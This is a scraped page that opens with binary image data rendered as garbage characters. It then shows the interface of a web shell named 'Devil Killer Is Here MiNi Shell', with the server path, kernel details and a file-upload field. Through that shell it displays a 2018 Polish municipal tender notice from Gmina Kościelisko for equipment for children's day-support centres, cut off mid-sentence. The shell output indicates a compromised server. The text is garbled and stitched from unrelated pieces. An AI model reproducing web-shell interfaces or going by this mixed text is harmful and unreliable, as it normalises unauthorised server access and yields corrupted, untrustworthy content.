JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180918/618301-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 618301-N-2018 z dnia 2018-09-18 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Kościelisko</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa wyposażenia pomieszczeń przeznaczonych na realizację projektu "Placówki Wsparcia Dziennego w Gminie Kościelisko"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"> ,,Placówki wsparcia dziennego w Gminie Kościelisko" Nr RPMP.09.02.01-12-0358/17 zadanie współfinansowane ze środków Unii Europejskiej- Europejski Fundusz Społeczny w ramach poddziałania 9.2.1 usługi społeczne i zdrowotne w regionie - (Typ projektu C - wsparcie dla tworzenia i/lub działalności placówek wsparcia dziennego dla dzieci i młodzieży)</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Kościelisko</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">49052655000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Strzelców Podhalańskich</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">44</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">34511 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kościelisko</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">182 079 100</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@koscielisko.com.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.gminakoscielisko.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.gminakoscielisko.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.gminakoscielisko.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">osobiście, za pośrednictwem poczty lub kuriera </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Kościelisko - 34-511 Kościelisko ul. Strzelców Podhalańskich 44- pokój nr 7</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa wyposażenia pomieszczeń przeznaczonych na realizację projektu "Placówki Wsparcia Dziennego w Gminie Kościelisko"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.272.47.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest zakup i dostawa wyposażenia pomieszczeń przeznaczonych na prowadzenie placówek wsparcia dziennego w miejscowościach Kościelisko i Dzianisz w Gminie Kościelisko.Zamawiający dokonał podziału zamówienia na 4 części:CZĘŚĆ I- wyposażenie do utrzymania czystościCZĘŚĆ II - wyposażenie łazienekCZĘŚĆ III-	wyposażenie strefy relaksuCZĘŚĆ IV-	wyposażenie kuchniZakres zamówienia obejmuje w szczególności:CZĘŚĆ I - wyposażenie do utrzymania czystości:odkurzacz piorący	2 szt.	Urządzenie czyszczące runo wykładziny usuwające nieprzyjemny zapach i przywracając jej świeży wygląd. Urządzenie wyposażone w :- elastyczną dyszę podłogową wyposażoną w listwy, które dopasowują się do powierzchni. - duży włącznik przystosowany do obsługi stopą, - zbiornik na wodę brudną z przeźroczystą pokrywą - system szybkiej i łatwej zmiany dysz- uchwyt na kabel zasilający.- miejsce na tabletki czyszczące. Praktyczne miejsce na przechowywanie tabletek czyszczących.- wąż do ekstrakcji ze zintegrowanym złączem, 2.5 m- uchwyt do przechowywania dyszy ręcznej- ssawka do tapicerki- dodatkowy uchwyt- hak na przewód zasilający- wąska dysza podłogowa do powierzchni twardych z elastycznymi listwami gumowymi- rękojeśćpodciśnienie (mbar/kPa) min. 220 / 22wydajność spryskiwania (l/min) min. 1ciśnienie spryskiwania (bar) min. 1zbiornik wody czystej / brudnej moc turbiny (W) min. 1250moc pompy (W) min. 40myjka ciśnieniowa	1 szt.	Urządzenie wyposażone w:- zbiornik na środek czyszczący- bęben na wąż- pistolet wysokociśnieniowy ze wskaźnikiem- lancę rotacyjną- końcówkę do czyszczenia powierzchni płaskich (elewacja, podjazd etc.)- dyszę rotacyjną- system szybkozłącza- system podawania środka czyszczącego przez zbiornik- filtr wody- środek czyszczący min. 0,5 l.Wydajność powierzchniowa urządzenia wynosząca min. 25 m?/h z ciśnienie (mbar/kPa) min. 20-maks. 120/2- maks.12wózek do sprzątania	2 szt.	Wózek do sprzątania 2-wiaderkowy w profesjonalnym mopem płaskim. Cechy produktu:- dwuwiaderkowy wózek- lekka i wytrzymała konstrukcja - rama metalowa i niepękająca podstawa z tworzywa- uniwersalna wyciskarka pasująca do wszystkich rodzajów mopów, wkładek i nakładek. - wiadro 28L- wiadro 15L - wyciskarka doczołowa (tylny odpływ wody) - kuweta 4l - wymiary ok.: 800mm x 410mm x1250mm- mop płaski z wkładem z mikrofazy - stelaż o szerokości ok. 40 cm lekki i solidnie wykonany, składany, umożliwiający szybkie odciśnięcie w wyciskarce bez zdejmowania wkładu ze stelaża. - stelaż mopa na przegubie metalowym, - kij aluminiowy z wygodnym gumowym uchwytem CZĘŚĆ II - wyposażenie łazienek:przedmiot	Ilość	opispojemniki na papier	4 szt.	Materiał: Stal nierdzewna 304 szczotkowanaWykończenie: MatowePojemność: 300 listkówZamknięcie: Zamek i kluczyk metalowyKontrola: Okienko do kontroli poziomu papieru w podajnikuWymiary podajnika: Wysokość 210 mm, szerokość 270 mm, głębokość 120 mmdozowniki na mydło	4 szt.	- Dozownik na mydło w płynie wykonany ze stali nierdzewnej matowej - Wykonany z wysokiej jakości stali nierdzewnej szczotkowanej - stalowy zamek- odporny na uderzenia- wziernik kontroli poziomu mydła- wewnętrzny zbiornik na mydło z możliwością wyjmowania- napełniany samodzielnie, dowolnym mydłem w płynie- pojemność ok.: 900 mllustra	3 szt. Lustro posiada zabezpieczająca folię na tylnej powierzchni lustra, która zmniejsza ryzyko skaleczenia się w przypadku stłuczenia. Rozmiary 58x40 cmCzęści metalowe: stal, Epoksydowa/poliestrowa powłoka proszkowaOkucia do zawieszania: stal, Tworzywo EVA, Epoksydowa/poliestrowa powłoka proszkowa, Guma silikonowaLustro: szkłokosze na śmieci 4 szt.	główna część: stal, epoksydowa/poliestrowa powłoka proszkowa, pokrywka/ uchwyt: stal nierdzewna, uchwyt pokry-wy/ wiadro: tworzywo polipropylenowe, sztabka: stal, galwanizowanespód: stal nierdzewna, guma syntetyczna.Wysokość ok.: 29 cmŚrednica ok.: 21 cmPojemność ok.: 3 lszczotka toaletowa	4 szt.	Pojemnik: ceramika porowata, szkliwo, noga/ nakładka wykończeniowa: cynk, chromowana powłokapokrywka: cynk, tworzywo polipropylenowe, chromowana powłokauchwyt: stal nierdzewna, części główne: plastik PPczęści metalowe: stal.Długość: ok. 42 cmCZĘŚĆ III - wyposażenie strefy relaksu:przedmiot	Ilość	opiszestaw pianek siedzisk	4 kpl.	Zestaw siedzisk o wys. 24 cm, wykonanych z pianki pokrytej skadenem.W zestawie:o 2 szare siedziska o bokach ok.: 47,6 cm; 2 x 37,2 cm; 22 cm.o 4 zielone siedziska o bokach ok.: 37,2 cm; 35,4 cm; 34,8 cm; 22 cm.gruszki	4 szt.	Miękkie i wygodne gruszki wypełnione granulatem, dopasowujące się kształtem do osoby siedzącej. Pokryte trwałą tkaniną PCV bez ftalanów, którą łatwo utrzymać w czystości.o waga ok. 4 kgo śr. ok. 60 cmo wys. ok. 80 cmmaterac	2 kpl.	Materace zapewniające bezpieczeństwo podczas zabawy dzieci. Materace można ze sobą łączyć za pomo-cą rzepów. Wykonane są z pianek pokrytych trwałą i zmywalną tkaniną. o 2 szt. o wym. materaca z wycięciami ok. 80 x 60 x 8 cm i ok. 75 x 75 x 8 cm o wym. materaca granatowego i błękitnego ok 80 x 60 x 8 cm o wym. ok. 85 x 88 x 8 cmdywan	2szt.	Szczegóły produktuRozm. o. 170x120 cmkolor: wielokolorowyskład dywanu: 100 % Polipropylen wysokość runa: ok. 13 mmciężar całkowity: ok. 3000 gr /m2 Wymiar:o	lampa	1 szt.	Kolor do uzgodnienia z wykonawcą na etapie realizacji dostaw. Waga: cement, tworzywo polietylenowePodstawa/ Rurka: stal, proszkowa powłokaKlosz: papier ryżowySzerokość abażura: ok. 33 cmWysokość: ok. 128 cmŚrednica podstawy: ok. 22 cmDługość kabla: ok. 1.7 mCZĘŚĆ IV - wyposażenie kuchni:przedmiot	Ilość	opiskomplet garnków 2 kpl.	Produkt nadający się do wszystkich rodzajów kuchenek/płyt, łącznie z płytą indukcyjną. Wykonany ze stali nierdzewnej. Zestaw Zawierający: - Garnek z pokrywką 5 l, - rondel z pokrywką 2 l - patelnia śr. 28 cm. Uchwyt/ Pokrycie/ Główna część: stal nierdzewna. Części główne: stal nierdzewna, aluminium, Pokryte Teflonem (R) Professional. Pokrywka: Szkło żaroodporne.patelnie 1 kpl.	Zestaw patelni - 3 sztuki o średnicy 20cm, 24cm, 28cm. Powłoka ceramiczne, zestaw z pasującymi pokryw-kami. Kolor czarny. Zgodna z kuchenkami gazowymi, elektrycznymi, indukcyjnymi i płytami ceramicz-nymi. talerze 4 kpl.	Komplet składający się z 18 sztuk- talerz obiadowy, talerz głęboki, talerz deserowy Produkt wykonany z porcelany skaleniowej, - naczynia trwałe i odporne na uderzenia. Możliwość używania w mikrofalówce i mycia w zmywarce. szklanki 10 kpl.	Komplet składający się z 6 sztuk. Produkt nadający się także do napojów gorących. Wykonana ze szkła hartowanego, trwały i odporny na uderzenia z możliwością zmywania w zmywarce. kubki 60 szt.	Kubek wykonany z porcelany skaleniowej, odporny na uderzenia i trwały z możliwością używania w mikrofalówce i zmywania w zmywarce.robot kuchenny 1 szt.	Produkt posiadający wyposażenie: Końcówka do ubijania, Końcówka do mieszania, Rozdrabniacz, Końcówka do zagniatania ciasta, Misa ze stali szlachetnej, Młynek, Lampka LED, Wyciskarka do owoców cytrusowych, Maszynka do mielenia mięsa, Malakser, Tarcza do frytek, Nóż ze stali szlachetnej. Konstrukcja: ergonomiczny kształt, gumowe nóżki antypoślizgowe, planetarna przekładnia, przyssawki, uchylna głowica, tworzywo sztuczne. czajnik elektryczny 2 szt.	Czajnik elektryczny o mocy 2400 W i pojemności ok. 1.7 l. Wyposażony w:wyjmowany filtr antywapniowy, obrotową podstawę, dwustronny wskaźnik poziomu wody i podświetlany wyłącznik, blokadę pokrywy, automatyczne wyłączenie po zagotowaniu, przy zdejmowaniu z podstawy, ochronę przed przegrzaniem oraz włączeniem pustego czajnika,Gumowe nóżki w podstawieKolor do uzgodnienia z wykonawcą na etapie dostawy.sztućce 2 kpl.	Komplet sztućców 30 sztuk ze stali nierdzewnej. Zestaw obejmuje: łyżkę, widelec, nóż, łyżeczkę do herbaty, widelec do ciast po 6 sztukakcesoria kuchenne - deska	2 szt.	Deska do krojenia z litego drewna - trwałego, naturalnego materiału, który nie tępi noży. Rowek w desce do zbierania soku z mięsa i owoców powstały podczas krojeniaStabilna podstawa do krojenia.Wymiary ok.: długość: 38 cm, szerokość: 27 cm, grubość: 22 mmakcesoria kuchenne - podkładki korkowe	7 kpl.	Podkładki: produkt wykonany z korka. Chroni powierzchnię stołu; obniża poziom hałasu przy rozkłada-niu naczyń.Rozmiar ok.: długość: 42 cm, szerokość: 32 cm, ilość w opakowaniu: 4 szt.akcesoria kuchenne - noże	2 kpl.	Produkt wykonany ze stali nierdzewnej. W zestawie: 1 nóż uniwersalny 14 cm (dł. całkowita 25 cm), 1 nóż kucharski 16 cm (dł. całkowita 29 cm) oraz 1 nóż kucharski 20 cm (dł. całkowita 33 cm). rękawice kuchenne	4 szt.	Rękawica: Tkanina: 100% bawełna, Wypełnienie: 100% poliester. Wymiar: długość: 33 cm. termosy	4 szt.	Termos, dzbanek cateringowy 1.5 l Nadruk kawa/herbataTermos wykonany z wysokiej jakości stali nierdzewnej 18/10.Podwójne ścianki zapewniają doskonałą izolację termiczną i utrzymują temperaturę napoju przez wiele godzin.Nadaje się do zimnych oraz ciepłych napojów.Posiada termiczne zabezpieczenie zamknięcia oraz możliwość wylewania płynów bez zdejmowania korka.Pojemność: 1,5 lWysokość: 25 cmZakres zamówienia obejmuje zakup, dostawę (załadunek, transport, rozładunek i wniesienie do pomieszczeń przeznacze-nia).Po stronie Wykonawcy leży utylizacja materiałów odpadowych i opakowań, za wyjątkiem tych, których posiadania wyma-gają producenci wyposażenia w trakcie postępowań reklamacyjnych.3.2.	Miejsce realizacji:3.2.1. Gmina Kościelisko - miejscowość Kościelisko - Budynek OSP Kościelisko - Pomieszczenia przeznaczone dla Placówki wsparcia (Kościelisko ul. Rysulówka 2).3.2.2. Gmina Kościelisko - miejscowość Dzianisz - Budynek Wielofunkcyjny - Pomieszczenia przeznaczone dla Pla-cówki wsparcia (Dzianisz 173).3.3.	Sposób realizacji dostaw:3.3.1. Zamawiający wymaga aby Wykonawca zapewnił realizacjęzamówienia przez osoby odpowiednio prze-szkolone i posiadające odpowiednie uprawnienia wymagane przez producentów urządzeń.3.3.2. Przedmioty muszą być fabrycznie nowe, wolne od wad, nie mogą posiadać znamion użytkowania, powin-ny spełniać wszystkie wymogi norm określonych obowiązującymi przepisami.3.4.	Sposób rozliczania:Za wykonane dostawy Zamawiający będzie płacił Wykonawcy wynagrodzenie ryczałtowe płatne na pod-stawie przygotowanego przez Wykonawcę rozliczenia końcowego zawierającego powykonawcze zesta-wienie elementów rozliczeniowych oraz faktur.3.5.	Warunki szczegółowe realizacji zamówienia:3.5.1.	Zamawiający zainteresowany jest wyłącznie kompleksowym wykonaniem dostaw.3.5.2.	Zamawiający zastrzega sobie możliwość zwrotu dostarczonego asortymentu niespełniającego wymogów ja-kościowych oczekiwanych przez Zamawiającego i wskazanych w SIWZ. 3.5.3.	Zamawiający 